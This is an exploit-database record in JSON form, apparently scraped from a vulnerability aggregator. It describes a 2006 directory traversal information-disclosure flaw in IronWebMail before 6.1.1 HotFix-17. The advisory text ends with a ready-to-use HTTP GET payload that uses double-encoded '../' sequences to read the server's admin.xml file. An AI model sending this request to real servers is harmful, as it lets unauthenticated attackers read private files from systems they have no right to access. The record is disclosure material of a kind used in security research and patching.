Description
ironwebmail 6.1.1 - Directory Traversal Information Disclosure
{"lastseen": "2020-04-01T19:05:59", "references": [], "description": "\nironwebmail 6.1.1 - Directory Traversal Information Disclosure", "edition": 1, "reporter": "Derek Callaway", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-10-16T00:00:00", "title": "ironwebmail 6.1.1 - Directory Traversal Information Disclosure", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.9, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.9}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-10-16T00:00:00", "id": "EXPLOITPACK:D5B57E345D9DA9A2EE1AA101B0F62970", "href": "", "viewCount": 3, "sourceData": "source: https://www.securityfocus.com/bid/20436/info\n\nIronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input.\n\nExploiting this issue allows remote, unauthenticated attackers to retrieve the contents of arbitrary files from vulnerable computers with the privileges of the webserver process. Information harvested may aid in further attacks.\n\nIronWebMail versions prior to 6.1.1 HotFix-17 are affected by this vulnerability.\n\nGET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0[CRLF][CRLF]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645786902, "score": 1659818015}, "_internal": {"score_hash": "4603cfaf9678441a06303e266f8c192f"}}
{}